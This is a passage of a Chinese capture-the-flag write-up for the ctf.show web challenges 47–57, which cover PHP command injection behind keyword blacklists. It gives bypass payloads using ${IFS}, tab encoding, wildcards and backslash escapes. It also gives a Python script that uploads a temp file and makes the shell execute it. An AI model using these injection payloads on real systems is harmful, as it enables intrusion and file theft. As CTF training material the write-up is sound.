class="variable">$c</span>.<span class="string">&quot; &gt;/dev/null 2&gt;&amp;1&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h2 id="一-分析代码：-16"><a href="#一-分析代码：-16" class="headerlink" title="一.分析代码："></a>一.分析代码：</h2><p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-07-12212418.png"></p>
<p>对以上进行了过滤。</p>
<p>增加了一些过滤</p>
<h2 id="二-解题思路：-15"><a href="#二-解题思路：-15" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c=strings%09????.???||</span><br></pre></td></tr></table></figure>



<h1 id="web-48"><a href="#web-48" class="headerlink" title="web 48"></a>web 48</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        system(<span class="variable">$c</span>.<span class="string">&quot; &gt;/dev/null 2&gt;&amp;1&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h2 id="一-分析代码：-17"><a href="#一-分析代码：-17" class="headerlink" title="一.分析代码："></a>一.分析代码：</h2><p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-07-12212922.png"></p>
<p>过滤以上所示</p>
<h2 id="二-解题思路：-16"><a href="#二-解题思路：-16" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c=strings%09????.???||</span><br></pre></td></tr></table></figure>



<h1 id="web-49"><a href="#web-49" class="headerlink" title="web 49"></a>web 49</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        system(<span class="variable">$c</span>.<span class="string">&quot; &gt;/dev/null 2&gt;&amp;1&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>



<h2 id="一-分析代码：-18"><a href="#一-分析代码：-18" class="headerlink" title="一.分析代码："></a>一.分析代码：</h2><p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-07-12213420.png"></p>
<p>对以上进行了过滤</p>
<h2 id="二-解题思路：-17"><a href="#二-解题思路：-17" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c=tac%09????.???||</span><br></pre></td></tr></table></figure>



<h1 id="web-50"><a href="#web-50" class="headerlink" title="web 50"></a>web 50</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        system(<span class="variable">$c</span>.<span class="string">&quot; &gt;/dev/null 2&gt;&amp;1&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<h2 id="一-分析代码：-19"><a href="#一-分析代码：-19" class="headerlink" title="一.分析代码："></a>一.分析代码：</h2><p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-07-12213717.png"></p>
<p>对以上进行了过滤</p>
<p>%09被过滤</p>
<p>&lt;&gt;和?同时使用不回显 所以用\代替？</p>
<h2 id="二-解题思路：-18"><a href="#二-解题思路：-18" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c=tac&lt;&gt;fla\g.php||</span><br></pre></td></tr></table></figure>



<h1 id="web-51"><a href="#web-51" class="headerlink" title="web 51"></a>web 51</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        system(<span class="variable">$c</span>.<span class="string">&quot; &gt;/dev/null 2&gt;&amp;1&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>



<h2 id="一-分析代码：-20"><a href="#一-分析代码：-20" class="headerlink" title="一.分析代码："></a>一.分析代码：</h2><p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-07-31164725.png"></p>
<p>对以上进行了过滤</p>
<h2 id="二-解题思路：-19"><a href="#二-解题思路：-19" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c=nl&lt;fla\g.php||</span><br></pre></td></tr></table></figure>



<h1 id="web-52"><a href="#web-52" class="headerlink" title="web 52"></a>web 52</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\&gt;|\&lt;/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        system(<span class="variable">$c</span>.<span class="string">&quot; &gt;/dev/null 2&gt;&amp;1&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>



<h2 id="一-分析代码：-21"><a href="#一-分析代码：-21" class="headerlink" title="一.分析代码："></a>一.分析代码：</h2><p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-08-01154408.png"></p>
<p>对以上进行了过滤</p>
<h2 id="二-解题思路：-20"><a href="#二-解题思路：-20" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><p>对我们的<code>&lt;&gt;</code>进行了过滤，我们可以使用<code>$&#123;IFS&#125;</code>来代替空格</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c=nl$&#123;IFS&#125;fla\g.php||</span><br></pre></td></tr></table></figure>



<h1 id="web-53"><a href="#web-53" class="headerlink" title="web 53"></a>web 53</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/\;|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\&gt;|\&lt;/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        <span class="keyword">echo</span>(<span class="variable">$c</span>);</span><br><span class="line">        <span class="variable">$d</span> = system(<span class="variable">$c</span>);</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>.<span class="variable">$d</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&#x27;no&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>

<h2 id="一-分析代码：-22"><a href="#一-分析代码：-22" class="headerlink" title="一.分析代码："></a>一.分析代码：</h2><p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-08-01155410.png"></p>
<p>过滤了以上内容。</p>
<h2 id="二-解题思路：-21"><a href="#二-解题思路：-21" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><p><code>$IFS</code>符号如果是在当前目录读文件则中间要用’’来分隔一下<br> 如果读其他路径下的如根目录 / 下的文件 则不用使用符分割<br> <code>$IFS</code>后边可以使用符号 但是不能直接跟字符 会显示无效命令<br> 可构造playload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c=nl$&#123;IFS&#125;????.???</span><br></pre></td></tr></table></figure>



<h1 id="web-54"><a href="#web-54" class="headerlink" title="web 54"></a>web 54</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if(isset($_GET[&#x27;c&#x27;]))&#123;</span><br><span class="line">    $c=$_GET[&#x27;c&#x27;];</span><br><span class="line">    if(!preg_match(&quot;/\;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|\`|\%|\x09|\x26|\&gt;|\&lt;/i&quot;, $c))&#123;</span><br><span class="line">        system($c);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>



<h2 id="一-分析代码-2"><a href="#一-分析代码-2" class="headerlink" title="一.分析代码:"></a>一.分析代码:</h2><p>增加了许多过滤，nl给过滤了</p>
<h2 id="二-解题思路：-22"><a href="#二-解题思路：-22" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><h3 id="方法一：-8"><a href="#方法一：-8" class="headerlink" title="方法一："></a>方法一：</h3><p>使用vi读，</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?c=vi$&#123;IFS&#125;????.???</span><br></pre></td></tr></table></figure>

<h3 id="方法二：-8"><a href="#方法二：-8" class="headerlink" title="方法二："></a>方法二：</h3><p><code>grep test *file</code> #在当前目录中，查找后缀有 file 字样的文件中包含 test 字符串的文件，并打印出该字符串的行</p>
<p>可构造playload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?c=uniq$&#123;IFS&#125;????.???</span><br><span class="line">?c=grep$&#123;IFS&#125;&#x27;&#123;&#x27;$&#123;IFS&#125;fl???php</span><br><span class="line">（在 fl???php匹配到的文件中，查找含有&#123;的文件，并打印出包含 &#123; 的这一行）</span><br></pre></td></tr></table></figure>



<h1 id="web-55"><a href="#web-55" class="headerlink" title="web 55"></a>web 55</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">// 你们在炫技吗？</span><br><span class="line">if(isset($_GET[&#x27;c&#x27;]))&#123;</span><br><span class="line">    $c=$_GET[&#x27;c&#x27;];</span><br><span class="line">    if(!preg_match(&quot;/\;|[a-z]|\`|\%|\x09|\x26|\&gt;|\&lt;/i&quot;, $c))&#123;</span><br><span class="line">        system($c);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h2 id="一-分析代码-3"><a href="#一-分析代码-3" class="headerlink" title="一.分析代码:"></a>一.分析代码:</h2><p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-08-0162713.png"></p>
<p>可以看出过滤的非常多</p>
<h2 id="二-解题思路：-23"><a href="#二-解题思路：-23" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><h3 id="方法一：-9"><a href="#方法一：-9" class="headerlink" title="方法一："></a>方法一：</h3><p>首先是/bin这个目录。<br>bin为binary的简写主要放置一些 系统的必备执行档例如:cat、cp、chmod df、dmesg、gzip、kill、ls、mkdir、more、mount、rm、su、tar、base64等</p>
<p>这题利用/bin/base64<br>base64这个命令就是将指定的文件的内容以base64加密的形式输出。<br>因为过滤了字母，正好可以用64来匹配，最终payload如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/???/????<span class="number">64</span> ????????</span><br></pre></td></tr></table></figure>

<p>匹配的是<code>/bin/base64 flag.php</code></p>
<h3 id="方法二：-9"><a href="#方法二：-9" class="headerlink" title="方法二："></a>方法二：</h3><p>bzip2是linux下面的压缩文件的命令 <a target="_blank" rel="noopener" href="https://www.runoob.com/linux/linux-comm-bzip2.html">关于bzip2命令的具体介绍</a><br> /usr/bin目录:</p>
<p>主要放置一些应用软件工具的必备执行档例如c++、g++、gcc、chdrv、diff、dig、du、eject、elm、free、gnome、 zip、htpasswd、kfm、ktop、last、less、locale、m4、make、man、mcopy、ncftp、 newaliases、nslookup passwd、quota、smb、wget等。</p>
<p>我们可以利用/usr/bin下的bzip2</p>
<p>意思就是说我们先将flag.php文件进行压缩，然后再将其下载<br>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?c=/???/???/????2 ????.???</span><br><span class="line">也就是/usr/bin/bzip2 flag.php</span><br></pre></td></tr></table></figure>









<h1 id="web-56"><a href="#web-56" class="headerlink" title="web 56"></a>web 56</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line"></span><br><span class="line">// 你们在炫技吗？</span><br><span class="line">if(isset($_GET[&#x27;c&#x27;]))&#123;</span><br><span class="line">    $c=$_GET[&#x27;c&#x27;];</span><br><span class="line">    if(!preg_match(&quot;/\;|[a-z]|[0-9]|\\$|\(|\&#123;|\&#x27;|\&quot;|\`|\%|\x09|\x26|\&gt;|\&lt;/i&quot;, $c))&#123;</span><br><span class="line">        system($c);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    highlight_file(__FILE__);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>



<h2 id="一-分析代码-4"><a href="#一-分析代码-4" class="headerlink" title="一.分析代码:"></a>一.分析代码:</h2><p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-08-01164034.png"></p>
<p>过滤的范围更广了</p>
<h2 id="二-解题思路：-24"><a href="#二-解题思路：-24" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><p>利用了P神的无数字字母getshell：<br> <a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html">无字母数字webshell之提高篇</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">发送一个上传文件的POST包，此时PHP会将我们上传的文件保存在临时文件夹下，默认的文件名是/tmp/phpXXXXXX，文件名最后6个字符是随机的大小写字母。</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><code>.</code>或者叫period，它的作用和source一样，就是用当前的shell执行一个文件中的命令。比如，当前运行的shell是bash，则<code>. file</code>的意思就是用bash执行file文件中的命令。</p>
<p>将命令写入文件后，可以利用点. 来执行文件中的命令，例如<code>. file</code>。也可以<code>source file</code>，但是这题过滤了字母，因此只能用点。</p>
<p>如何正确匹配到我们上传的文件呢？探索过程见p神的文章，最后的利用是<code>/???/????????[@-[]</code>  ， <code>[@-[]</code>是通配符，用来表示大写字母。</p>
<p>写一个文件上传的前端：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html lang=&quot;en&quot;&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;meta charset=&quot;UTF-8&quot;&gt;</span><br><span class="line">    &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;</span><br><span class="line">    &lt;title&gt;POST数据包POC&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;form action=&quot;http://46230c96-8291-44b8-a58c-c133ec248231.chall.ctf.show/&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot;&gt;</span><br><span class="line">&lt;!--链接是当前打开的题目链接--&gt;</span><br><span class="line">    &lt;label for=&quot;file&quot;&gt;文件名：&lt;/label&gt;</span><br><span class="line">    &lt;input type=&quot;file&quot; name=&quot;file&quot; id=&quot;file&quot;&gt;&lt;br&gt;</span><br><span class="line">    &lt;input type=&quot;submit&quot; name=&quot;submit&quot; value=&quot;提交&quot;&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>

<p>上传一个txt文件，文件内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">#!/bin/sh</span><br><span class="line">ls</span><br></pre></td></tr></table></figure>

<p>注：shell程序必须以”#!/bin/sh”开始，#! /bin/sh 是指此脚本使用/bin/sh来解释执行，#!是特殊的表示符，其后面跟的是解释此脚本的shell的路径</p>
<p>上传抓包</p>
<p>抓包之后添加参数c如下，多发包几次（因为并不一定生成的临时文件的最后一个字母就是大写字母），可以看到执行了ls命令</p>
<p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-08-01233816.png"></p>
<p>之后用cat指令读就可以</p>
<p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-08-01234018.png"></p>
<p>或者运行以下脚本即可得到flag：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    url = <span class="string">&quot;http://a88c904d-6cd4-4eba-b7e9-4c37e0cf3a7d.chall.ctf.show/?c=.+/???/????????[@-[]&quot;</span></span><br><span class="line">    r = requests.post(url, files=&#123;<span class="string">&quot;file&quot;</span>: (<span class="string">&#x27;feng.txt&#x27;</span>, <span class="string">b&#x27;cat flag.php&#x27;</span>)&#125;)</span><br><span class="line">    <span class="keyword">if</span> r.text.find(<span class="string">&quot;flag&quot;</span>) &gt; <span class="number">0</span>:</span><br><span class="line">        <span class="built_in">print</span>(r.text)</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>







<h1 id="web-57"><a href="#web-57" class="headerlink" title="web 57"></a>web 57</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">// 还能炫的动吗？</span></span><br><span class="line"><span class="comment">//flag in 36.php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/\;|[a-z]|[0-9]|\`|\|\#|\&#x27;|\&quot;|\`|\%|\x09|\x26|\x0a|\&gt;|\&lt;|\.|\,|\?|\*|\-|\=|\[/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        system(<span class="string">&quot;cat &quot;</span>.<span class="variable">$c</span>.<span class="string">&quot;.php&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h2 id="一-分析代码-5"><a href="#一-分析代码-5" class="headerlink" title="一.分析代码:"></a>一.分析代码:</h2><p><img src="https://xyhutc.oss-cn-qingdao.aliyuncs.com/giteetuchuang/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2022-08-02154648.png"></p>
<p>过滤了以上的内容，同时提示我们flag in 36.php</p>
<h2 id="二-解题思路：-25"><a href="#二-解题思路：-25" class="headerlink" title="二.解题思路："></a>二.解题思路：</h2><p>取反：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">首先看等号左边(100) 的二进制表示为: 0110 0100 按位取反的意思就是每一位取反，0变1，1变0</span><br><span class="line">所以: ~100 的二进制表示为：1001 1011 所以等号左边=1001 1011</span><br><span class="line"></span><br><span class="line">再看右边</span><br><span class="line">-101. 一旦看到出现负数，那么这个数一定是按有符号数的规则来表示的。一个二进制数 按位取反并加一以后就可以得到它自己的负数的补码，也就是说： ~x+1=-x 所以，我们把101按位取反加一 先取反：</span><br><span class="line">~101=10011010 再加一： ~101+1=10011011=-101 所以等号右边=10011011=左边，所以等号成立。</span><br></pre></td></tr></table></figure>

<p><code> 双小括号 (( )) 是 Bash Shell 中专门用来进行整数运算的命令，它的效率很高，写法灵活，是企业运维中常用的运算命令。 通俗地讲，就是将数学运算表达式放在((和))之间。 表达式可以只有一个，也可以有多个，多个表达式之间以逗号,分隔。对于多个表达式的情况，以最后一个表达式的值作为整个 (( ))命令的执行结果。 可以使用$获取 (( )) 命令的结果，这和使用$获得变量值是类似的。 可以在 (( )) 前面加上$符号获取 (( )) 命令的执行结果，也即获取整个表达式的值。以 c=$((a+b)) 为例，即将 a+b 这个表达式的运算结果赋值给变量 c。 注意，类似 c=((a+b)) 这样的写法是错误的，不加$就不能取得表达式的结果。</code></p>
